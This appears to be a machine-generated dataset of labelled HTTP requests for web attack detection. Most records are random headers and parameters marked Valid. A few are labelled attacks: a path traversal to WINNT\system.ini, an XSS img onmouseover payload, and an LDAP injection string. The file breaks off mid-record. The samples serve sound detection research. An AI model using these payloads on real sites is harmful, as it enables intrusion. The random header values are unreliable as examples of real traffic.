Via: 6.3 www.atdidest.js
Transfer-Encoding: deflate
Upgrade: omrin/0.6
Warning: 422 www.rinltnh.jpeg "aiAkn" 
X-Forwarded-For: 46.39.95.124
X-Serial-Number: 119603156999
----: -----------
~~~~~: ~~~~~~~~~~~~~

th=xTi9&euSdets3een=:7t&iyYk=lnl&aohqreEprmrelle=hm2-ir&u651c7JDxmo=hnyfjd)i

End - Id: 7462
Start - Id: 34830
class: Valid
POST /oAXIQ_Tqk4JP4Iz/YfgnSjb77nymnujdo/4BePkLCRY@U/ijZCJXK@AntbN2Jv6JAx.cfm? HTTP/1.0
Content-Length: 272
Content-Language: 2tyo
Content-Encoding: deflate
Content-Location: /nlgzu.png
Content-MD5: Z3Z1ZWNuOWR0dXR1dHRpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Sep 06 06:08:53 GMT
Last-Modified: Sat, 29 Nov 08 15:15:49 CET
Host: www.2nar.gov:317
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: aluh-oeid;q=0.3, 7yxrN-oo0;q=0.5, rt-tsiedtN;q=0.5, bsdet-rorcya;q=0.5, iaaara-n;q=0.9
Cache-Control: only-if-cached
Client-ip: 189.46.101.138
Cookie: dauayrrieedtoaa=awpv7Raq;eeentene6v=snl1waarl c1
Cookie2: $Version="488"
Date: Sat, 22 Nov 08 12:40:53 GMT
ETag: W/"rSKYJOQNoxRNC3TL5G"
Expect: 100-continue
From: i8g2jct@4te48.fr
If-Modified-Since: Fri, 20 Jan 06 22:12:46 UTC
If-Unmodified-Since: Wed, 06 May 09 16:57:09 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 07 Apr 05 21:18:38 UTC
Max-Forwards: 3
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest response="56FFddd048DB85AF437AF9E1cF7F3afc"
Authorization: NTLM amVFNmRlQWVJVXNlcWJpYXQ1cnRtaHRlTnJudEdnaWFlc2Rweg==
Range: 623768-8270,-361888,-69728
Referer: http://iaerau.it/hsreeta/uehs/Eelr9/ourdaef/et4rh.sh
TE: trailers,trailers,chunked
Trailer: Referer
User-Agent: eawwrlcee9o
UA-CPU: Sparc
UA-Disp: 308,802,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8809x6223
Via: HTTP/1.3 47.15.163.40, ortah/8.5 www.nefT6B.gif, 4.4 www.zqq3t4e.jpeg:416
Transfer-Encoding: deflate
Upgrade: xAqmi/0.2, o1hgea/4.1, rIdu/2.7, hori/6.4, 4dToph/6.1
Warning: 029 www.ldelcm.jpg "mt7u16ipeiusedskeu1" 
X-Forwarded-For: 77.62.199.33
X-Serial-Number: 11691729475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dTtsmNhP8t=likedelete&rsEsad=1450&ieoesn25xhxt=fe@&ti=7885737748&tnzghsnE5ae1e=0144&CICmetasAk=919&6bDv2logOBkfTQ=asc&hicdeDeny=95&Nr8ndehcrh=yrncm8si&ivusqUTi=etcxnrasnem&ersmet5Drrn=<&rbnpeIxrgva=hCzRH&nn5tb2sitC=hoOmict)9;fsj%ebs&f3rpats= r&gxm9itr=1068514823

End - Id: 34830
Start - Id: 27164
class: Valid
GET /Y45p5eKscript.css?tse=087415651&ii2=8860204&mlahednexSaaoet=24012813&nYoht6utkT1ea2b=32773&bipirS2uezs=blinkjexecwrrdanc6rnij&eozir54hms=%40gY%27nftphxrpositionBnerta+&a2hojienefssO=564968056&L8TT8sebrdS=741&9teSrlaaetINsW=dloetbn&YCoieti=ToVImmi&tlqmxe=9307287521&sh5ep=38228&s6l=b5JEBLTQcLf&oafnseSosiyitn=7960 HTTP/1.1
Host: 251.130.184.182
Connection: eaecsa
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.4
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 99.161.249.175
Cookie: Ko.qOuApassthruZ=41979;kfhlneedb3raa=tettmriVbodr;ZwKgoiV=dsiuwsAdno5ce9mt;ty=xpci2
Cookie2: $Version="08"
Date: Fri, 15 Jan 10 11:30:15 UTC
ETag: "f3dTSwKWN8d2GumF3R-"
Expect: Ougoui
From: rfaD@lnxcgefa16.uk
If-Modified-Since: Sun, 11 Apr 04 06:45:51 UTC
If-Unmodified-Since: Thu, 06 Sep 07 07:58:30 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8405
MIME-Version: 6.1
Pragma: rrbEt=hDrfuTy
Proxy-Authorization: NTLM dWk0OW5tZXNzdEFMRW9oZXJvdXBhZmVhYXphdWtkc3luaTY2M0VvcEVyaA==
Authorization: euNa oeot2e=8ilb
Range: 026-10,-71,7-952
Referer: /saai1aqn/wXH9il/gsti.tiff
TE: trailers
Trailer: Accept
User-Agent: rtmz2ves (93P3OU9P.x)
UA-CPU: MIPS
UA-Disp: 137,543,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 925x719
Via: 3.7 www.QentThs.css:78, Nsee/5.4 191.104.58.144, HTTP/4.9 190.23.192.178
Transfer-Encoding: gzip
Upgrade: neae/3.6, fitz7t/2.1
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 13.58.9.225
X-Serial-Number: 13809536911
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27164
Start - Id: 17330
class: Valid
GET /eBsmriPw/I4otvi/2W@t.DR8kLZMG/iTr/mrvPVr7E0Nzg/wpf/rQ9.asp?Oqe=wexect%3B&atKdn5Aam=kcetr HTTP/1.1
Host: 96.84.11.162:5104
Connection: keep-alive
Accept: audio/x-wav, image/png, image/jpeg
Accept-Charset: iso-8859-8-i;q=0.6, iso-2022-kr;q=0.6
Accept-Encoding: compress;q=0.7, identity, compress;q=0.8, gzip, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 251.211.186.188
Cookie: dndybodruaa=A 9s;nomnwsomrw3e=nxg;TOrhtntso=1rdivim;7oapeo4pFdehC=i@LmnGYoV9;BX-vco8UT=snfscriptw0e4tewRnctekt3;iohim=eIteawun
Cookie2: $Version="840"
Date: Mon, 19 Jan 04 23:06:58 GMT
ETag: W/"yMDXvl2uoFuOP3i"
Expect: 100-continue
From: 1rsdas@zamn2no.de
If-Modified-Since: Thu, 17 Dec 09 13:31:25 UTC
If-Unmodified-Since: Tue, 16 Oct 07 24:42:10 UTC
If-Match: *
If-None-Match: "JhVZ@tv.XdXvrzLTy"
If-Range: "6zxEAMwvFoZaGmly2G"
Max-Forwards: 717
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest uri=/dEasnr/nifefdsN/jtmItno/tqlthnia/esaa.dll
Authorization: NTLM Mm9hbnRndnN0N2V0NjdiZmZlYWRkaG5rYWl5YXRzYmlzSDFzOWVkbGFxaA==
Range: 570800-
Referer: http://www.odspo5.com/mthm6v/znnhmi/tbMln.tar.gz
TE: trailers
Trailer: Range
User-Agent: Mozilla/4.4 (compatible; MSIE 7.3; Solaris; jnte; wethu; s4Ots)
UA-CPU: 68000
UA-Disp: 1914,5330,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 455x7663
Via: 2.2 98.163.169.76
Transfer-Encoding: gzip
Upgrade: miR/8.7
Warning: 540 139.31.62.25:6754 "edlefMhEnqak" 
X-Forwarded-For: 137.232.96.91
X-Serial-Number: 75371955994853740
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17330
Start - Id: 2327
class: Valid
GET /tlrcrcuue/ti5ed30.aspx?emSs=E%40i6t6ashutdown&e2jt8giaurrareo=26743301&fl8isr=tXxes_bQhM&Lelnsseirt=0308&tvwnn1ze=07955363&6R-5odwp-eeRyy=neydkeWn HTTP/1.0
Host: 64.1.251.73:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn, isiri-3342, windows-1257
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 23.190.221.43
Cookie: Tr5ton=yasl
Cookie2: $Version="88"
Date: Thu, 07 Dec 06 10:20:29 CET
ETag: W/"12r_mDVpIiXqbKs@hcS9"
Expect: 100-continue
From: omno@duATd.net
If-Modified-Since: Tue, 30 Oct 07 12:03:53 UTC
If-Unmodified-Since: Sat, 17 Oct 09 21:20:14 UTC
If-Match: "L6EDfvEbrSVeZWY"
If-None-Match: "zFgjTP3ubRqas8UaJq3"
If-Range: *
Max-Forwards: 0
MIME-Version: 5.5
Pragma: ottAN='anaeO1Ix'
Proxy-Authorization: dajt egdm=itdutal
Authorization: Basic Z29pcjplbHJob2Ft
Range: 744728-20044,-10
Referer: http://H6xeaEe.it/m4ru7.mpg
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/0.2 (X11; U; Solaris 9.5; tp-7e; rv:4.6.1) Gecko/61443622
UA-CPU: Sparc
UA-Disp: 581,250,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 130x258
Via: 5.6 www.utceesc.htm
Transfer-Encoding: identity
Upgrade: gnSI1/5.9, Aono7/5.8
Warning: 577 www.dr7dc0.jpeg "thtn1momzurbsO" "Wed, 09 Jun 04 22:21:46 GMT"
X-Forwarded-For: 250.186.179.59
X-Serial-Number: 7123081582615631
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2327
Start - Id: 8220
class: Valid
GET /Vf9HjiframeA/adminvFb8SaF_j/9aw8rabeh8as/3eWED/amJS/RyQrshutdownprocessing-instructiony_iG-xe/euicteFLurticw6lr.php?padcybauz6tr5s=d-a%28r&efuia=28161&Tdazoh1=roecs&Eaybuoi=0reweea6rr1gtqoe&sJC2p=%25gsit&woSs=niZJn6BYVd&degbohcsn=istczlexchildra+tmpi&Lbei6o3foTeq1a=nqd9se5nlw3+passwdksiedrop%5Ce&h7OjSea8rk=Eesvhc++a3lpe9&I94b=nnsvfaogtE&lesab8i=er&lorhhyesidcit43=w3v0-&hpf=8135978923 HTTP/1.1
Host: www.7ahO.st
Connection: ezrnneoa
Accept: */*;q=0.8
Accept-Charset: windows-874;q=0.3
Accept-Encoding: 
Accept-Language: 3a-wtrlrer;q=0.4
Cache-Control: min-fresh=6
Client-ip: 4.97.133.201
Cookie: ttfoshlteqeufa=-httpso~b
Cookie2: $Version="111"
Date: Wed, 28 Oct 09 18:46:36 UTC
ETag: W/"6Yal4L@TVxr.WUoqs"
Expect: 100-continue
From: naraez2@nbaeit.cz
If-Modified-Since: Tue, 31 Mar 09 18:15:30 UTC
If-Unmodified-Since: Fri, 11 Feb 05 05:25:39 UTC
If-Match: *
If-None-Match: "GHqEM_WeJcGwy4OqZQF"
If-Range: *
Max-Forwards: 02
MIME-Version: 1.5
Pragma: zseN1='sonhthEl'
Proxy-Authorization: Digest qop=auth
Authorization: Digest nonce
Range: -164292,-5
Referer: /esxoig/Pdeiu.asp
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: a2MNze http://www.goznscx.it
UA-CPU: StrongARM
UA-Disp: 260,910,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4023x6297
Via: 3.0 www.hheveP.jpg:76
Transfer-Encoding: compress
Upgrade: ib6Ex/5.7, aZse/0.7
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 176.93.53.162
X-Serial-Number: 24287
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 8220
Start - Id: 18041
class: Valid
GET /S9neufiacphw6eeacs/t8db/nv/U8GUsock_streamt0B/sc1BE3Qj.P9qypv.tiff?wY21b@tnetcatGPA=10098806&o1=odd-Bb4PmOxt&tE3yseyu9tooceO=3989330&hrs=4&rvt=atseif+uservicesyegno&oO0onieeo=mRfUt8&ers6yOLE=8015522&dentornio=3&ydiA=shutdown6&ta1d=EdawfIollatra&ltdona=u9-lw60gj&nodnn=978718&CgC3_MBtmpuip=37281141 HTTP/1.1
Host: www.5porbssee1.gov
Connection: close
Accept: application/x-tar
Accept-Charset: koi8-r;q=0.6
Accept-Encoding: deflate, deflate;q=0.1, identity
Accept-Language: f-noe6Os;q=0.2
Cache-Control: no-transform
Client-ip: 63.243.148.27
Cookie: VCgl0P=3lelehmniu1;juofnesgxldin=hd;ts=lwPeN47vl8Eg;teArat=451573;heaTw=%raeT;Pra6zLAM=3967575
Cookie2: $Version="7"
Date: Tue, 31 May 05 16:51:23 GMT
ETag: "Y5XVc5vLTuEmHw7jl"
Expect: dwn4uiro
From: ubo9@noxriwRe.cz
If-Modified-Since: Sun, 02 Aug 09 06:45:11 UTC
If-Unmodified-Since: Sun, 29 Apr 07 04:09:17 CET
If-Match: "ktxf8V@b7srH3rax0.8"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="aicatet"
Authorization: Digest qop=auth-int
Range: -498682,294755-,-12868
Referer: /ft9c/nHSthun/htobhgf.dll
TE: trailers,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.7 (X11; U; Unix 4.0; ot-ta; rv:5.0.3) Gecko/93531744
UA-CPU: PowerPC
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 258x9628
Via: FTP/6.0 117.37.54.28:77
Transfer-Encoding: compress
Upgrade: mnit2e/4.0, 20vtg/4.8, nef3hy/1.1
Warning: 923 136.21.74.55:3970 "tpeOiltiem" 
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 60954
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18041
Start - Id: 33207
class: Valid
PUT /fteere87esi2bLncbahl/wnoo27ntsmov/wnncp/ohG1O/iqM/g53lSzowedpy7g5m8i.js? HTTP/1.1
Content-Length: 36
Content-Language: i6Il,mlr,sofi
Content-Encoding: deflate
Content-Location: /0e2dBs/m0brH.dll
Content-MD5: cXJvYWR0QW1vaWVsZW8ybw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Sep 04 10:57:44 GMT
Last-Modified: Sat, 26 Mar 05 15:56:38 GMT
Host: www.incfo7u.fr
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-7;q=0.3, macintosh;q=0.3, iso-2022-kr;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 220.243.16.18
Cookie: i4exIh1ako=56;lliaau=rr-C4XpY_;dimi=buih;8dt=WlgsNslHiBprsock_streami;iLNDNaEI=azZnw;WwFdr@echoKiv=wZ9U
Cookie2: $Version="281"
Date: Sat, 07 May 05 17:13:00 CET
ETag: "eO6DrlpiUCZW99bdmj"
Expect: Ioechl9a
From: na2aepi@d4eieegeg.fr
If-Modified-Since: Thu, 27 Dec 07 07:41:17 GMT
If-Unmodified-Since: Fri, 09 Nov 07 22:59:01 CET
If-Match: ".sfLZaonn2Hp-FNpu"
If-None-Match: "25ecNckVWMPm6uQoiRc"
If-Range: Fri, 17 Jul 09 17:35:11 CET
Max-Forwards: 2
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic aGFpaWg6ZHdiZGN2ZQ==
Range: 5-,5-93172,41903-8251
Referer: http://ra7hon.st/qjto8hMN/ntih/lcah6w/76x0tey.mdb
TE: trailers
Trailer: Accept-Charset
User-Agent: q-IMRaH4@ http://www.edbheede.com
UA-CPU: MIPS
UA-Disp: 3198,1175,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3773x407
Via: HTTP/9.8 114.160.117.51
Transfer-Encoding: identity
Upgrade: neatde/1.7
Warning: 077 www.beaAsoet.png:0598 "ynai" "Tue, 22 Apr 08 08:27:50 GMT"
X-Forwarded-For: 184.36.249.222
X-Serial-Number: 6725811933666552
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7epM6a2seft=fYPNQ.f&tud1noasa=ofiTmS

End - Id: 33207
Start - Id: 45585
class: PathTransversal
GET /q2Z@r/8ay8mtbn4esth2e/oT6nt/5cA3b7fFY9avwS31eFr/txhpJklqh0Txt.htm?muhIeoehBdmwEuh=iiu&5W4wXU5xrW=446279&rpmcbsmssn8ynr=Aie&aa=dr%7Et&slmf=7&Hiludo7fannU=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.1
Host: 107.12.33.16
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: identity, deflate;q=0.0, identity;q=0.2
Accept-Language: 7f-tnE;q=0.3
Cache-Control: no-transform
Client-ip: 181.101.28.152
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="513"
Date: Tue, 12 Oct 04 22:11:19 UTC
ETag: W/"b3lipcZBuzQKnQD6by"
Expect: 100-continue
From: v9zS@tEnsif6n2h.net
If-Modified-Since: Thu, 18 Aug 05 09:09:31 UTC
If-Unmodified-Since: Sun, 11 Apr 10 05:48:17 GMT
If-Match: *
If-None-Match: "qKIFnAfIf@bzpURXptw"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.5
Pragma: d9g='R'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="3e092Ba963B0CA1f5a1fBABba2dDf2bE"
Range: -3163,-605229
Referer: /0eudtiee.rar
TE: chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.3 (compatible; Konqueror/4.8; Unix; fOre)
UA-CPU: StrongARM
UA-Disp: 911,8166,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 0.6 230.210.43.29, HTTP/1.0 www.rssichs.htm
Transfer-Encoding: gzip
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45585
Start - Id: 23850
class: Valid
GET /sGT0CngDPzI/wmBUwinntqL5/J4dJ.dll?6P8NhKm@Zr=eJyMTA&otRstaihgeSgiee=38662&eneth0tpestg=o&Aovsgssl=194940&NM7-=vueiruPca+DBa&locationGshutdown94_wm3uN=92 HTTP/1.1
Host: www.ehfA.biz
Connection: keep-alive
Accept: image/*;q=0.6, application/x-tar, text/*;q=0.3
Accept-Charset: shift_jis;q=0.0, cp-936, windows-1257;q=0.8, windows-1251
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=75261
Client-ip: 158.198.144.188
Cookie: mosmiw=+5ii;dirbdrisskaw=]Ioe;snep=0709867;neoyIa=l 7Ne-su;aole4=[h
Cookie2: $Version="77"
Date: Thu, 26 Feb 04 14:22:30 CET
ETag: "TuRdTw-hBPfWNyzx"
Expect: 100-continue
From: iaaodun@atohoee.uk
If-Modified-Since: Thu, 16 Feb 06 12:17:53 GMT
If-Unmodified-Since: Wed, 07 Dec 05 08:52:34 GMT
If-Match: *
If-None-Match: "VAit6yHuCEyA-iU"
If-Range: *
Max-Forwards: 4152
MIME-Version: 2.3
Pragma: oicdtGt='feIeohd'
Proxy-Authorization: Digest opaque="Tany"
Authorization: Digest cnonce="w4n7b"
Range: 120-9
Referer: http://oeaBea.fr/hy9ese/fenk.jsp
TE: trailers,deflate,gzip;q=0.8
Trailer: Upgrade
User-Agent: Mozilla/9.3 (Windows; U; Win98 4.8; ST-ha; rv:1.8.8) Gecko/06227519
UA-CPU: PowerPC
UA-Disp: 6334,6622,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1738x3451
Via: HTTP/0.0 33.93.42.161, HTTP/5.0 123.230.103.116, FTP/5.9 181.134.201.222:4
Transfer-Encoding: euat
Upgrade: tmu3/0.7
Warning: 334 www.dlwn9r.html "poruwu1jl" 
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 119652447524751
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23850
Start - Id: 31545
class: Valid
GET /0_/trrXopiiti/omKfn/txCNwj3R504n86FKJx/iay.php3? HTTP/1.0
Host: 203.248.175.56
Connection: close
Accept: text/xml
Accept-Charset: x-mac-icelandic
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=87
Client-ip: 234.66.106.126
Cookie: tRJghollinku=aWsO_t9j;etnmDeartna=8;ycdxarestBp=k f:;~;xf2Rldec=4693685
Cookie2: $Version="1"
Date: Thu, 23 Jun 05 06:26:14 UTC
ETag: "AhwrREaLU@Il.S2"
Expect: 100-continue
From: hlyrn9n@fimlaeyny.st
If-Modified-Since: Sat, 07 Apr 07 22:35:36 GMT
If-Unmodified-Since: Fri, 13 Jan 06 20:43:14 CET
If-Match: "8AY9m7_ySi6@Q0CO8B"
If-None-Match: *
If-Range: Thu, 07 Apr 05 10:09:37 GMT
Max-Forwards: 5371
MIME-Version: 3.2
Pragma: emolcosa='ong7'
Proxy-Authorization: NTLM dE1laXRucXB0bjJ0ZGRybHlpYW9ubm50c3JobnVtZXpoZGhhZWU=
Authorization: Basic M3RuZWU6dHV3aXJwZXI=
Range: -2245
Referer: http://sare0r3.uk/mcnn0/Thnenv/heL9ot.mdb
TE: chunked
Trailer: Via
User-Agent: 2RWaEwSxk http://www.nlcNio.be
UA-CPU: x86
UA-Disp: 5662,024,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8565x5206
Via: HTTP/4.9 91.197.233.180, 6.2 100.171.65.165
Transfer-Encoding: sPos
Upgrade: iwe/8.2, ep3eof/7.6, paia/0.4, e4dhI/1.4
Warning: 856 www.5poeh.html "4tEbim5icfni" 
X-Forwarded-For: 231.71.249.70
X-Serial-Number: 7616561595248452
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31545
Start - Id: 27036
class: Valid
GET /g4zQJiN5SrVXCJmZX_LC/0_HAHgFxQ/rx8/TnNits/cerine6iu3Echb/hLzl.asmx?niTiSl24stRgtit=7 HTTP/1.1
Host: www.pLBe4c2.cz
Connection: ttrwVo
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 48.35.201.58
Cookie: g6nGvhei=8tnoali delete7srml[idzsg;f9=tu4JtdfgQXPj;cfw=dhibidf6mbpf
Cookie2: $Version="2"
Date: Sat, 06 Mar 10 03:36:50 UTC
ETag: W/"Q2o9leRJa@r_IgZQ"
Expect: iianhaSe
From: RPoOyeue@ifon.de
If-Modified-Since: Sun, 07 Jan 07 18:17:51 GMT
If-Unmodified-Since: Sun, 16 Apr 06 04:42:37 GMT
If-Match: *
If-None-Match: "pOAw_CpH4bgpCrQ"
If-Range: *
Max-Forwards: 279
MIME-Version: 2.2
Pragma: e6r=a7
Proxy-Authorization: Basic b3RuaWFSYTpodG5vdGk=
Authorization: tAst smata=oAfq
Range: 34-,11052-0053,7-3
Referer: http://www.otkyco.com/r6hbe/xf0nah/Ranih/hj0xnh/1i5dn3a.wav
TE: chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/1.3 (Windows; U; WinNT 4.1; ls-te; rv:9.8.3) Gecko/50346148
UA-CPU: MIPS
UA-Disp: 2539,8756,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6860x985
Via: 9.6 58.18.73.230, 1.6 124.45.183.34:97, 6.0 233.196.201.42
Transfer-Encoding: identity
Upgrade: oleg/7.0, eesLi/0.3, s6tY/7.4, Ehnhw1/4.6
Warning: 487 190.19.226.50 "taog3tlnve" "Mon, 04 Jul 05 09:35:24 CET"
X-Forwarded-For: 41.72.7.124
X-Serial-Number: 200865883783933233
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27036
Start - Id: 22841
class: Valid
GET /J0M/GgKVkK8aqm2Om/efWt/hzroluueeg/KuatL.eDRIZ@0jftp/taac/nueNoi/nsLtdnj7x2spitvbh.js?HLspinC7ip=907UV-3dxY&chEpspu=onoscript&renVadminiFzua9=8708768624&h10a9rt1=s HTTP/1.1
Host: www.ntaE.org:3
Connection: close
Accept: text/*, application/x-tar
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: min-fresh=7102
Client-ip: 39.158.127.75
Cookie: SS=e2 l8sni;nlntrapalse=hfrierfarren;7tdtdstui=rels A0a;no1lntexsnhcttl= 8n;Uktlmysfes=cex 
Cookie2: $Version="24"
Date: Sat, 23 Jun 07 17:51:55 UTC
ETag: "a_aMJOhUcEIiw0nque"
Expect: 100-continue
From: trsehe0n@ajce.be
If-Modified-Since: Thu, 08 Jun 06 04:58:25 UTC
If-Unmodified-Since: Sun, 23 May 04 03:48:30 GMT
If-Match: "b4FjTY.0es@5j7UzLq"
If-None-Match: "iMxl3FPnzJ1axfE."
If-Range: *
Max-Forwards: 55
MIME-Version: 6.1
Pragma: im='borysggh'
Proxy-Authorization: NTLM YXNucmlkZW5uaXJuaGNzcGVuZHM5c29zZW1ycmVlZXVpb2RJck5hdHU1cjJpRQ==
Authorization: ta3nN8 eoeehzo=eeatdu
Range: 1016-,1-936,-4477
Referer: /tApIdhw.jpeg
TE: deflate;q=0.7,trailers,gzip;q=0.7
Trailer: Referer
User-Agent: Mozilla/1.3 (Windows; U; Win98 8.4; r0-ai; rv:2.0.7) Gecko/65213115
UA-CPU: MIPS
UA-Disp: 7850,134,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 134x6878
Via: 2.7 185.196.233.134:2102, FTP/8.3 www.d5sppq.png:0615, 3.5 www.otariCet.shtml:31284
Transfer-Encoding: deflate
Upgrade: hrnaea/8.0, Re4t/7.6, 7c4/1.7, 3hq/6.9
Warning: 047 www.ties.htm "wnstmfmcneTi" 
X-Forwarded-For: 207.142.89.78
X-Serial-Number: 8712140
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22841
Start - Id: 46840
class: XSS
PUT /fs/sfoflhem6p6/saloae8t1eVia816ae/hDneYdwPxDsV2Tw/rh0vNa357mh1h8c/z7B6n/izzuJoRCxz55IRbT1dkg.msf? HTTP/1.0
Content-Length: 152
Content-Language: onaoo,ceo
Content-Encoding: deflate
Content-Location: http://www.geioxon.com/aa9geca.png
Content-MD5: Nm1vcm9hYWFlZWlnaWF0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 06 Jan 07 10:57:53 GMT
Last-Modified: Wed, 13 Dec 06 14:47:41 GMT
Host: 163.98.238.219:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr, x-mac-ce, iso-8859-8-i
Accept-Encoding: *
Accept-Language: 1y-s, Hi89-tmsn, ei-dt;q=0.3, a0zme4i-tneO;q=0.2, oiicaure-heit;q=0.3
Cache-Control: no-transform
Client-ip: 220.1.146.36
Cookie: ykcayt7t=eliiS1DF0XO;hul=wuAd1Z9EeQM;IwhereTHservicesMC40=txraceejw9dx3ia0s;9Es=3lfLmen3ctt
Cookie2: $Version="944"
Date: Mon, 12 Jul 04 03:25:55 UTC
ETag: "4y65XizpsvxblzyDhxg"
Expect: spJklt
From: fassgdh4@tikal0.com
If-Modified-Since: Fri, 03 Nov 06 12:49:41 UTC
If-Unmodified-Since: Mon, 05 May 08 20:40:51 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jan 10 17:14:26 CET
Max-Forwards: 18
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM Y2xlb0RhYWloY2Vsbm50dG5oZW94ZWV0MHNveWllTW84bm5pajhmcjdyb3Q5
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: -85
Referer: /espnf/wRye/iseeds/sQaer9.php
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/1.2 (Windows; U; Windows NT 4.2; es-on; rv:9.8.3) Gecko/01104647
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: HTTP/2.4 135.210.142.135:82, FTP/6.2 255.173.206.114, FTP/5.6 www.ardelohn.tiff
Transfer-Encoding: compress
Upgrade: ccSen/7.1
Warning: 515 www.wruorr.jpg "seuttb" 
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9gPdh=pHeneaw&ylgaocesNi=o9ateeG&noeicohyhA=<img   src=  "     itte>     "   onmouseover = "   [alert ('sn');]     "   >

End - Id: 46840
Start - Id: 37935
class: LdapInjection
GET /honountt/a5HlwyCuFcg.html?ilOtS=%29++%28+++%7C++%28bee%3DdOo*%29 HTTP/1.1
Host: www.ti7us48na.net
Connection: BeAreyr
Accept: video/quicktime, audio/basic, text/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=63
Client-ip: 140.12.39.241
Cookie: zoNhrimkTs4=MrIerecitlvtwpmgA;qr7pmiPpbT=cg;fgaIfsh4=a2DolE_sLUY6;vu3n=re;trla=8704
Cookie2: $Version="6"
Date: Wed, 18 Aug 04 24:00:02 GMT
ETag: W/"JIaiNtCmlEs.7pkMV8yn"
Expect: Rna7leoD
From: heal@ehrTn.gov
